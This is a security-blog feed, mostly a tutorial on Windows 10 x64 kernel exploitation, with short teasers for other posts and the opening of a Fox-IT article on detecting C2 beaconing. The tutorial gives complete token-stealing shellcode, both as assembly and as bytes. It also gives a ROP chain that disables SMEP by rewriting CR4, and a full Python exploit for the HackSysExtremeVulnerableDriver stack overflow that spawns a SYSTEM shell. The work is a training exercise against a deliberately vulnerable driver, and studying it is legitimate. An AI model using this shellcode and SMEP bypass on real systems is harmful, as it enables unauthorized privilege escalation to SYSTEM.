17 March 2020 at 11:08

Assignment #4: Custom Shellcode Encoder As the 4th SLAE’s assignment I was required to build a custom shellcode encoder for the execve payload, which I did, here how. Encoder Implementations I’ve decided to not relay on XORing functionalities as most antivirus solutions are now well aware of this encoding schema, the same reason for which […]

The post SLAE – Assignment #4: Custom shellcode encoder appeared first on VoidSec.

Perform a Nessus scan via port forwarding rules only

By: voidsec
13 March 2020 at 09:34

This post will be a bit different from the usual technical stuff, mostly because I was not able to find any reliable solution on Internet and I would like to help other people having the same doubt/question, it’s nothing advanced, it’s just something useful that I didn’t see posted before. During a recent engagement I […]

The post Perform a Nessus scan via port forwarding rules only appeared first on VoidSec.

SLAE – Assignment #3: Egghunter

By: voidsec
20 February 2020 at 15:25

Assignment #3: Egghunter This time the assignment was very interesting, here the requirements: study an egg hunting shellcode and create a working demo, it should be configurable for different payloads. As many before me, I’ve started my research journey with Skape’s papers: “Searching Process Virtual Address Space”. I was honestly amazed by the paper content, […]

The post SLAE – Assignment #3: Egghunter appeared first on VoidSec.

Exploit Development: Panic! At The Kernel - Token Stealing Payloads Revisited on Windows 10 x64 and Bypassing SMEP

1 February 2020 at 00:00

Introduction

Same ol’ story with this blog post- I am continuing to expand my research/overall knowledge on Windows kernel exploitation, in addition to garnering more experience with exploit development in general. Previously I have talked about a couple of vulnerability classes on Windows 7 x86, which is an OS with minimal protections. With this post, I wanted to take a deeper dive into token stealing payloads, which I have previously talked about on x86, and see what differences the x64 architecture may have. In addition, I wanted to try to do a better job of explaining how these payloads work. This post and research also aims to get myself more familiar with the x64 architecture, which is a far more common in 2020, and understand protections such as Supervisor Mode Execution Prevention (SMEP).

Gimme Dem Tokens!

As apart of Windows, there is something known as the SYSTEM process. The SYSTEM process, PID of 4, houses the majority of kernel mode system threads. The threads stored in the SYSTEM process, only run in context of kernel mode. Recall that a process is a “container”, of sorts, for threads. A thread is the actual item within a process that performs the execution of code. You may be asking “How does this help us?” Especially, if you did not see my last post. In Windows, each process object, known as _EPROCESS, has something known as an access token. Recall that an object is a dynamically created (configured at runtime) structure. Continuing on, this access token determines the security context of a process or a thread. Since the SYSTEM process houses execution of kernel mode code, it will need to run in a security context that allows it to access the kernel. This would require system or administrative privilege. This is why our goal will be to identify the access token value of the SYSTEM process and copy it to a process that we control, or the process we are using to exploit the system. From there, we can spawn cmd.exe from the now privileged process, which will grant us NT AUTHORITY\SYSTEM privileged code execution.

Identifying the SYSTEM Process Access Token

We will use Windows 10 x64 to outline this overall process. First, boot up WinDbg on your debugger machine and start a kernel debugging session with your debugee machine (see my post on setting up a debugging enviornment). In addition, I noticed on Windows 10, I had to execute the following command on my debugger machine after completing the bcdedit.exe commands from my previous post: bcdedit.exe /dbgsettings serial debugport:1 baudrate:115200)

Once that is setup, execute the following command, to dump the active processes:

!process 0 0

This returns a few fields of each process. We are most interested in the “process address”, which has been outlined in the image above at address 0xffffe60284651040. This is the address of the _EPROCESS structure for a specified process (the SYSTEM process in this case). After enumerating the process address, we can enumerate much more detailed information about process using the _EPROCESS structure.

dt nt!_EPROCESS <Process address>

dt will display information about various variables, data types, etc. As you can see from the image above, various data types of the SYSTEM process’s _EPROCESS structure have been displayed. If you continue down the kd window in WinDbg, you will see the Token field, at an offset of _EPROCESS + 0x358.

What does this mean? That means for each process on Windows, the access token is located at an offset of 0x358 from the process address. We will for sure be using this information later. Before moving on, however, let’s take a look at how a Token is stored.

As you can see from the above image, there is something called _EX_FAST_REF, or an Executive Fast Reference union. The difference between a union and a structure, is that a union stores data types at the same memory location (notice there is no difference in the offset of the various fields to the base of an _EX_FAST_REF union as shown in the image below. All of them are at an offset of 0x000). This is what the access token of a process is stored in. Let’s take a closer look.

dt nt!_EX_FAST_REF

Take a look at the RefCnt element. This is a value, appended to the access token, that keeps track of references of the access token. On x86, this is 3 bits. On x64 (which is our current architecture) this is 4 bits, as shown above. We want to clear these bits out, using bitwise AND. That way, we just extract the actual value of the Token, and not other unnecessary metadata.

To extract the value of the token, we simply need to view the _EX_FAST_REF union of the SYSTEM process at an offset of 0x358 (which is where our token resides). From there, we can figure out how to go about clearing out RefCnt.

dt nt!_EX_FAST_REF <Process address>+0x358

As you can see, RefCnt is equal to 0y0111. 0y denotes a binary value. So this means RefCnt in this instance equals 7 in decimal.

So, let’s use bitwise AND to try to clear out those last few bits.

? TOKEN & 0xf

As you can see, the result is 7. This is not the value we want- it is actually the inverse of it. Logic tells us, we should take the inverse of 0xf, -0xf.

So- we have finally extracted the value of the raw access token. At this point, let’s see what happens when we copy this token to a normal cmd.exe session.

Openenig a new cmd.exe process on the debuggee machine:

After spawning a cmd.exe process on the debuggee, let’s identify the process address in the debugger.

!process 0 0 cmd.exe

As you can see, the process address for our cmd.exe process is located at 0xffffe6028694d580. We also know, based on our research earlier, that the Token of a process is located at an offset of 0x358 from the process address. Let’s Use WinDbg to overwrite the cmd.exe access token with the access token of the SYSTEM process.

Now, let’s take a look back at our previous cmd.exe process.

As you can see, cmd.exe has become a privileged process! Now the only question remains- how do we do this dynamically with a piece of shellcode?

Assembly? Who Needs It. I Will Never Need To Know That- It’s iRrElEvAnT

‘Nuff said.

Anyways, let’s develop an assembly program that can dynamically perform the above tasks in x64.

So let’s start with this logic- instead of spawning a cmd.exe process and then copying the SYSTEM process access token to it- why don’t we just copy the access token to the current process when exploitation occurs? The current process during exploitation should be the process that triggers the vulnerability (the process where the exploit code is ran from). From there, we could spawn cmd.exe from (and in context) of our current process after our exploit has finished. That cmd.exe process would then have administrative privilege.

Before we can get there though, let’s look into how we can obtain information about the current process.

If you use the Microsoft Docs (formerly known as MSDN) to look into process data structures you will come across this article. This article states there is a Windows API function that can identify the current process and return a pointer to it! PsGetCurrentProcessId() is that function. This Windows API function identifies the current thread and then returns a pointer to the process in which that thread is found. This is identical to IoGetCurrentProcess(). However, Microsoft recommends users invoke PsGetCurrentProgress() instead. Let’s unassemble that function in WinDbg.

uf nt!PsGetCurrentProcess

Let’s take a look at the first instruction mov rax, qword ptr gs:[188h]. As you can see, the GS segment register is in use here. This register points to a data segment, used to access different types of data structures. If you take a closer look at this segment, at an offset of 0x188 bytes, you will see KiInitialThread. This is a pointer to the _KTHREAD entry in the current threads _ETHREAD structure. As a point of contention, know that _KTHREAD is the first entry in _ETHREAD structure. The _ETHREAD structure is the thread object for a thread (similar to how _EPROCESS is the process object for a process) and will display more granular information about a thread. nt!KiInitialThread is the address of that _ETHREAD structure. Let’s take a closer look.

dqs gs:[188h]

This shows the GS segment register, at an offset of 0x188, holds an address of 0xffffd500e0c0cc00 (different on your machine because of ASLR/KASLR). This should be the nt!KiInitialThread, or the _ETHREAD structure for the current thread. Let’s verify this with WinDbg.

!thread -p

As you can see, we have verified that nt!KiInitialThread represents the address of the current thread.

Recall what was mentioned about threads and processes earlier. Threads are the part of a process that actually perform execution of code (for our purposes, these are kernel threads). Now that we have identified the current thread, let’s identify the process associated with that thread (which would be the current process). Let’s go back to the image above where we unassembled the PsGetCurrentProcess() function.

mov rax, qword ptr [rax,0B8h]

RAX alread contains the value of the GS segment register at an offset of 0x188 (which contains the current thread). The above assembly instruction will move the value of nt!KiInitialThread + 0xB8 into RAX. Logic tells us this has to be the location of our current process, as the only instruction left in the PsGetCurrentProcess() routine is a ret. Let’s investigate this further.

Since we believe this is going to be our current process, let’s view this data in an _EPROCESS structure.

dt nt!_EPROCESS poi(nt!KiInitialThread+0xb8)

First, a little WinDbg kung-fu. poi essentially dereferences a pointer, which means obtaining the value a pointer points to.

And as you can see, we have found where our current proccess is! The PID for the current process at this time is the SYSTEM process (PID = 4). This is subject to change dependent on what is executing, etc. But, it is very important we are able to identify the current process.

Let’s start building out an assembly program that tracks what we are doing.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		    ; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]	   	    ; Current process (_EPROCESS)
  	mov rbx, rax			    ; Copy current process (_EPROCESS) to rbx

Notice that I copied the current process, stored in RAX, into RBX as well. You will see why this is needed here shortly.

Take Me For A Loop!

Let’s take a look at a few more elements of the _EPROCESS structure.

dt nt!_EPROCESS

Let’s take a look at the data structure of ActiveProcessLinks, _LIST_ENTRY

dt nt!_LIST_ENTRY

ActiveProcessLinks is what keeps track of the list of current processes. How does it keep track of these processes you may be wondering? Its data structure is _LIST_ENTRY, a doubly linked list. This means that each element in the linked list not only points to the next element, but it also points to the previous one. Essentially, the elements point in each direction. As mentioned earlier and just as a point of reiteration, this linked list is responsible for keeping track of all active processes.

There are two elements of _EPROCESS we need to keep track of. The first element, located at an offset of 0x2e0 on Windows 10 x64, is UniqueProcessId. This is the PID of the process. The other element is ActiveProcessLinks, which is located at an offset 0x2e8.

So essentially what we can do in x64 assembly, is locate the current process from the aforementioned method of PsGetCurrentProcess(). From there, we can iterate and loop through the _EPROCESS structure’s ActiveLinkProcess element (which keeps track of every process via a doubly linked list). After reading in the current ActiveProcessLinks element, we can compare the current UniqueProcessId (PID) to the constant 4, which is the PID of the SYSTEM process. Let’s continue our already started assembly program.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]	   	; Current process (_EPROCESS)
  	mov rbx, rax			; Copy current process (_EPROCESS) to rbx
	
__loop:
	mov rbx, [rbx + 0x2e8] 		; ActiveProcessLinks
	sub rbx, 0x2e8		   	; Go back to current process (_EPROCESS)
	mov rcx, [rbx + 0x2e0] 		; UniqueProcessId (PID)
	cmp rcx, 4 			; Compare PID to SYSTEM PID 
	jnz __loop			; Loop until SYSTEM PID is found

Once the SYSTEM process’s _EPROCESS structure has been found, we can now go ahead and retrieve the token and copy it to our current process. This will unleash God mode on our current process. God, please have mercy on the soul of our poor little process.

Once we have found the SYSTEM process, remember that the Token element is located at an offset of 0x358 to the _EPROCESS structure of the process.

Let’s finish out the rest of our token stealing payload for Windows 10 x64.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]		; Current process (_EPROCESS)
	mov rbx, rax			; Copy current process (_EPROCESS) to rbx
__loop:
	mov rbx, [rbx + 0x2e8] 		; ActiveProcessLinks
	sub rbx, 0x2e8		   	; Go back to current process (_EPROCESS)
	mov rcx, [rbx + 0x2e0] 		; UniqueProcessId (PID)
	cmp rcx, 4 			; Compare PID to SYSTEM PID 
	jnz __loop			; Loop until SYSTEM PID is found

	mov rcx, [rbx + 0x358]		; SYSTEM token is @ offset _EPROCESS + 0x358
	and cl, 0xf0			; Clear out _EX_FAST_REF RefCnt
	mov [rax + 0x358], rcx		; Copy SYSTEM token to current process

	xor rax, rax			; set NTSTATUS SUCCESS
	ret				; Done!

Notice our use of bitwise AND. We are clearing out the last 4 bits of the RCX register, via the CL register. If you have read my post about a socket reuse exploit, you will know I talk about using the lower byte registers of the x86 or x64 registers (RCX, ECX, CX, CH, CL, etc). The last 4 bits we need to clear out , in an x64 architecture, are located in the low or L 8-bit register (CL, AL, BL, etc).

As you can see also, we ended our shellcode by using bitwise XOR to clear out RAX. NTSTATUS uses RAX as the regsiter for the error code. NTSTATUS, when a value of 0 is returned, means the operations successfully performed.

Before we go ahead and show off our payload, let’s develop an exploit that outlines bypassing SMEP. We will use a stack overflow as an example, in the kernel, to outline using ROP to bypass SMEP.

SMEP Says Hello

What is SMEP? SMEP, or Supervisor Mode Execution Prevention, is a protection that was first implemented in Windows 8 (in context of Windows). When we talk about executing code for a kernel exploit, the most common technique is to allocate the shellcode in user mode and the call it from the kernel. This means the user mode code will be called in context of the kernel, giving us the applicable permissions to obtain SYSTEM privileges.

SMEP is a prevention that does not allow us execute code stored in a ring 3 page from ring 0 (executing code from a higher ring in general). This means we cannot execute user mode code from kernel mode. In order to bypass SMEP, let’s understand how it is implemented.

SMEP policy is mandated/enabled via the CR4 register. According to Intel, the CR4 register is a control register. Each bit in this register is responsible for various features being enabled on the OS. The 20th bit of the CR4 register is responsible for SMEP being enabled. If the 20th bit of the CR4 register is set to 1, SMEP is enabled. When the bit is set to 0, SMEP is disabled. Let’s take a look at the CR4 register on Windows with SMEP enabled in normal hexadecimal format, as well as binary (so we can really see where that 20th bit resides).

r cr4

The CR4 register has a value of 0x00000000001506f8 in hexadecimal. Let’s view that in binary, so we can see where the 20th bit resides.

.formats cr4

As you can see, the 20th bit is outlined in the image above (counting from the right). Let’s use the .formats command again to see what the value in the CR4 register needs to be, in order to bypass SMEP.

As you can see from the above image, when the 20th bit of the CR4 register is flipped, the hexadecimal value would be 0x00000000000506f8.

This post will cover how to bypass SMEP via ROP using the above information. Before we do, let’s talk a bit more about SMEP implementation and other potential bypasses.

SMEP is ENFORCED via the page table entry (PTE) of a memory page through the form of “flags”. Recall that a page table is what contains information about which part of physical memory maps to virtual memory. The PTE for a memory page has various flags that are associated with it. Two of those flags are U, for user mode or S, for supervisor mode (kernel mode). This flag is checked when said memory is accessed by the memory management unit (MMU). Before we move on, lets talk about CPU modes for a second. Ring 3 is responsible for user mode application code. Ring 0 is responsible for operating system level code (kernel mode). The CPU can transition its current privilege level (CPL) based on what is executing. I will not get into the lower level details of syscalls, sysrets, or other various routines that occur when the CPU changes the CPL. This is also not a blog on how paging works. If you are interested in learning more, I HIGHLY suggest the book What Makes It Page: The Windows 7 (x64) Virtual Memory Manager by Enrico Martignetti. Although this is specific to Windows 7, I believe these same concepts apply today. I give this background information, because SMEP bypassses could potentially abuse this functionality.

Think of the implementation of SMEP as the following:

Laws are created by the government. HOWEVER, the legislatures do not roam the streets enforcing the law. This is the job of our police force.

The same concept applies to SMEP. SMEP is enabled by the CR4 register- but the CR4 register does not enforce it. That is the job of the page table entries.

Why bring this up? Athough we will be outlining a SMEP bypass via ROP, let’s consider another scenario. Let’s say we have an arbitrary read and write primitive. Put aside the fact that PTEs are randomized for now. What if you had a read primitive to know where the PTE for the memory page of your shellcode was? Another potential (and interesting) way to bypass SMEP would be not to “disable SMEP” at all. Let’s think outside the box! Instead of “going to the mountain”- why not “bring the mountain to us”? We could potentially use our read primitive to locate our user mode shellcode page, and then use our write primitive to overwrite the PTE for our shellcode and flip the U (usermode) flag into an S (supervisor mode) flag! That way, when that particular address is executed although it is a “user mode address”, it is still executed because now the permissions of that page are that of a kernel mode page.

Although page table entries are randomized now, this presentation by Morten Schenk of Offensive Security talks about derandomizing page table entries.

Morten explains the steps as the following, if you are too lazy to read his work:

  1. Obtain read/write primitive
  2. Leak ntoskrnl.exe (kernel base)
  3. Locate MiGetPteAddress() (can be done dynamically instead of static offsets)
  4. Use PTE base to obtain PTE of any memory page
  5. Change bit (whether it is copying shellcode to page and flipping NX bit or flipping U/S bit of a user mode page)

Again, I will not be covering this method of bypassing SMEP until I have done more research on memory paging in Windows. See the end of this blog for my thoughts on other SMEP bypasses going forward.

SMEP Says Goodbye

Let’s use the an overflow to outline bypasssing SMEP with ROP. ROP assumes we have control over the stack (as each ROP gadget returns back to the stack). Since SMEP is enabled, our ROP gagdets will need to come from kernel mode pages. Since we are assuming medium integrity here, we can call EnumDeviceDrivers() to obtain the kernel base- which bypasses KASLR.

Essentially, here is how our ROP chain will work

-------------------
pop <reg> ; ret
-------------------
VALUE_WANTED_IN_CR4 (0x506f8) - This can be our own user supplied value.
-------------------
mov cr4, <reg> ; ret
-------------------
User mode payload address
-------------------

Let’s go hunting for these ROP gadgets. (NOTE - ALL OFFSETS TO ROP GADGETS WILL VARY DEPENDING ON OS, PATCH LEVEL, ETC.) Remember, these ROP gadgets need to be kernel mode addresses. We will use rp++ to enumerate rop gadgets in ntoskrnl.exe. If you take a look at my post about ROP, you will see how to use this tool.

Let’s figure out a way to control the contents of the CR4 register. Although we won’t probably won’t be able to directly manipulate the contents of the register directly, perhaps we can move the contents of a register that we can control into the CR4 register. Recall that a pop <reg> operation will take the contents of the next item on the stack, and store it in the register following the pop operation. Let’s keep this in mind.

Using rp++, we have found a nice ROP gadget in ntoskrnl.exe, that allows us to store the contents of CR4 in the ecx register (the “second” 32-bits of the RCX register.)

As you can see, this ROP gadget is “located” at 0x140108552. However, since this is a kernel mode address- rp++ (from usermode and not ran as an administrator) will not give us the full address of this. However, if you remove the first 3 bytes, the rest of the “address” is really an offset from the kernel base. This means this ROP gadget is located at ntoskrnl.exe + 0x108552.

Awesome! rp++ was a bit wrong in its enumeration. rp++ says that we can put ECX into the CR4 register. Howerver, upon further inspection, we can see this ROP gadget ACTUALLY points to a mov cr4, rcx instruction. This is perfect for our use case! We have a way to move the contents of the RCX register into the CR4 register. You may be asking “Okay, we can control the CR4 register via the RCX register- but how does this help us?” Recall one of the properties of ROP from my previous post. Whenever we had a nice ROP gadget that allowed a desired intruction, but there was an unecessary pop in the gadget, we used filler data of NOPs. This is because we are just simply placing data in a register- we are not executing it.

The same principle applies here. If we can pop our intended flag value into RCX, we should have no problem. As we saw before, our intended CR4 register value should be 0x506f8.

Real quick with brevity- let’s say rp++ was right in that we could only control the contents of the ECX register (instead of RCX). Would this affect us?

Recall, however, how the registers work here.

-----------------------------------
               RCX
-----------------------------------
                       ECX
-----------------------------------
                             CX
-----------------------------------
                           CH    CL
-----------------------------------

This means, even though RCX contains 0x00000000000506f8, a mov cr4, ecx would take the lower 32-bits of RCX (which is ECX) and place it into the CR4 register. This would mean ECX would equal 0x000506f8- and that value would end up in CR4. So even though we would theoretically using both RCX and ECX, due to lack of pop ecx ROP gadgets, we will be unaffected!

Now, let’s continue on to controlling the RCX register.

Let’s find a pop rcx gadget!

Nice! We have a ROP gadget located at ntoskrnl.exe + 0x3544. Let’s update our POC with some breakpoints where our user mode shellcode will reside, to verify we can hit our shellcode. This POC takes care of the semantics such as finding the offset to the ret instruction we are overwriting, etc.

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi


payload = bytearray(
    "\xCC" * 50
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
# We also need to bypass SMEP before calling this shellcode
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Need kernel leak to bypass KASLR
# Using Windows API to enumerate base addresses
# We need kernel mode ROP gadgets

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."

get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Offset to ret overwrite
input_buffer = "\x41" * 2056

# SMEP says goodbye
print "[+] Starting ROP chain. Goodbye SMEP..."
input_buffer += struct.pack('<Q', kernel_address + 0x3544)      # pop rcx; ret

print "[+] Flipped SMEP bit to 0 in RCX..."
input_buffer += struct.pack('<Q', 0x506f8)           		# Intended CR4 value

print "[+] Placed disabled SMEP value in CR4..."
input_buffer += struct.pack('<Q', kernel_address + 0x108552)    # mov cr4, rcx ; ret

print "[+] SMEP disabled!"
input_buffer += struct.pack('<Q', ptr)                          # Location of user mode shellcode

input_buffer_length = len(input_buffer)

# 0x222003 = IOCTL code that will jump to TriggerStackOverflow() function
# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x222003,                           # dwIoControlCode
    input_buffer,                       # lpInBuffer
    input_buffer_length,                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

Let’s take a look in WinDbg.

As you can see, we have hit the ret we are going to overwrite.

Before we step through, let’s view the call stack- to see how execution will proceed.

k

Open the image above in a new tab if you are having trouble viewing.

To help better understand the output of the call stack, the column Call Site is going to be the memory address that is executed. The RetAddr column is where the Call Site address will return to when it is done completing.

As you can see, the compromised ret is located at HEVD!TriggerStackOverflow+0xc8. From there we will return to 0xfffff80302c82544, or AuthzBasepRemoveSecurityAttributeValueFromLists+0x70. The next value in the RetAddr column, is the intended value for our CR4 register, 0x00000000000506f8.

Recall that a ret instruction will load RSP into RIP. Therefore, since our intended CR4 value is located on the stack, technically our first ROP gadget would “return” to 0x00000000000506f8. However, the pop rcx will take that value off of the stack and place it into RCX. Meaning we do not have to worry about returning to that value, which is not a valid memory address.

Upon the ret from the pop rcx ROP gadget, we will jump into the next ROP gadget, mov cr4, rcx, which will load RCX into CR4. That ROP gadget is located at 0xfffff80302d87552, or KiFlushCurrentTbWorker+0x12. To finish things out, we have the location of our user mode code, at 0x0000000000b70000.

After stepping through the vulnerable ret instruction, we see we have hit our first ROP gadget.

Now that we are here, stepping through should pop our intended CR4 value into RCX

Perfect. Stepping through, we should land on our next ROP gadget- which will move RCX (desired value to disable SMEP) into CR4.

Perfect! Let’s disable SMEP!

Nice! As you can see, after our ROP gadgets are executed - we hit our breakpoints (placeholder for our shellcode to verify SMEP is disabled)!

This means we have succesfully disabled SMEP, and we can execute usermode shellcode! Let’s finalize this exploit with a working POC. We will merge our payload concepts with the exploit now! Let’s update our script with weaponized shellcode!

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi


payload = bytearray(
    "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
    "\x48\x8B\x80\xB8\x00\x00\x00"                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
    "\x48\x89\xC3"                                      # mov rbx,rax         ; Copy current process to rbx
    "\x48\x8B\x9B\xE8\x02\x00\x00"                      # mov rbx,[rbx+0x2e8] ; ActiveProcessLinks
    "\x48\x81\xEB\xE8\x02\x00\x00"                      # sub rbx,0x2e8       ; Go back to current process
    "\x48\x8B\x8B\xE0\x02\x00\x00"                      # mov rcx,[rbx+0x2e0] ; UniqueProcessId (PID)
    "\x48\x83\xF9\x04"                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
    "\x75\xE5"                                          # jnz 0x13            ; Loop until SYSTEM PID is found
    "\x48\x8B\x8B\x58\x03\x00\x00"                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x348
    "\x80\xE1\xF0"                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
    "\x48\x89\x88\x58\x03\x00\x00"                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
    "\x48\x83\xC4\x40"                                  # add rsp, 0x40       ; RESTORE (Specific to HEVD)
    "\xC3"                                              # ret                 ; Done!
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
# We also need to bypass SMEP before calling this shellcode
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Need kernel leak to bypass KASLR
# Using Windows API to enumerate base addresses
# We need kernel mode ROP gadgets

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."

get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Offset to ret overwrite
input_buffer = ("\x41" * 2056)

# SMEP says goodbye
print "[+] Starting ROP chain. Goodbye SMEP..."
input_buffer += struct.pack('<Q', kernel_address + 0x3544)      # pop rcx; ret

print "[+] Flipped SMEP bit to 0 in RCX..."
input_buffer += struct.pack('<Q', 0x506f8)           		        # Intended CR4 value

print "[+] Placed disabled SMEP value in CR4..."
input_buffer += struct.pack('<Q', kernel_address + 0x108552)    # mov cr4, rcx ; ret

print "[+] SMEP disabled!"
input_buffer += struct.pack('<Q', ptr)                          # Location of user mode shellcode

input_buffer_length = len(input_buffer)

# 0x222003 = IOCTL code that will jump to TriggerStackOverflow() function
# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x222003,                           # dwIoControlCode
    input_buffer,                       # lpInBuffer
    input_buffer_length,                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

os.system("cmd.exe /k cd C:\\")

This shellcode adds 0x40 to RSP as you can see from above. This is specific to the process I was exploiting, to resume execution. Also in this case, RAX was already set to 0. Therefore, there was no need to xor rax, rax.

As you can see, SMEP has been bypassed!

SMEP Bypass via PTE Overwrite

Perhaps in another blog I will come back to this. I am going to go back and do some more research on the memory manger unit and memory paging in Windows. When that research has concluded, I will get into the low level details of overwriting page table entries to turn user mode pages into kernel mode pages. In addition, I will go and do more research on pool memory in kernel mode and look into how pool overflows and use-after-free kernel exploits function and behave.

Thank you for joining me along this journey! And thank you to Morten Schenk, Alex Ionescu, and Intel. You all have aided me greatly.

Please feel free to contact me with any suggestions, comments, or corrections! I am open to it all.

Peace, love, and positivity :-)

Hunting for beacons

By: Fox IT
15 January 2020 at 11:29

Author: Ruud van Luijk

Attacks need to have a form of communication with their victim machines, also known as Command and Control (C2) [1]. This can be in the form of a continuous connection or connect the victim machine directly. However, it’s convenient to have the victim machine connect to you. In other words: It has to communicate back. This blog describes a method to detect one technique utilized by many popular attack frameworks based solely on connection metadata and statistics, in turn enabling this technique to be used on multiple log sources.

Many attack frameworks use beaconing

Frameworks like Cobalt Strike, PoshC2, and Empire, but also some run-in-the-mill malware, frequently check-in at the C2 server to retrieve commands or to communicate results back. In Cobalt Strike this is called a beacon, but concept is similar for many contemporary frameworks. In this blog the term ‘beaconing’ is used as a general term for the call-backs of malware. Previous fingerprinting techniques shows that there are more than a thousand Cobalt Strike servers online in a month that are actively used by several threat actors, making this an important point to focus on.

While the underlying code differs slightly from tool to tool, they often exist of two components to set up a pattern for a connection: a sleep and a jitter. The sleep component indicates how long the beacon has to sleep before checking in again, and the jitter modifies the sleep time so that a random pattern emerges. For example: 60 seconds of sleep with 10% jitter results in a uniformly random sleep between 54 and 66 seconds (PoshC2 [3], Empire [4]) or a uniformly random sleep between 54 and 60 seconds (Cobalt Strike [5]). Note the slight difference in calculation.

This jitter weakens the pattern but will not dissolve the pattern entirely. Moreover, due to the uniform distribution used for the sleep function the jitter is symmetrical. This is in our advantage while detecting this behaviour!

Detecting the beacon

While static signatures are often sufficient in detecting attacks, this is not the case for beaconing. Most frameworks are very customizable to your needs and preferences. This makes it hard to write correct and reliable signatures. Yet, the pattern does not change that much. Therefore, our objective is to find a beaconing pattern in seemingly pattern less connections in real-time using a more anomaly-based method. We encourage other blue teams/defenders to do the same.

Since the average and median of the time between the connections is more or less constant, we can look for connections where the times between consecutive connections constantly stay within a certain range. Regular traffic should not follow such pattern. For example, it makes a few fast-consecutive connections, then a longer time pause, and then again, some interaction. Using a wider range will detect the beacons with a lot of jitter, but more legitimate traffic will also fall in the wider range. There is a clear trade-off between false positives and accounting for more jitter.

In order to track the pattern of connections, we create connection pairs. For example, an IP that connects to a certain host, can be expressed as ’10.0.0.1 -> somerandomhost.com”. This is done for all connection pairs in the network. We will deep dive into one connection pair.

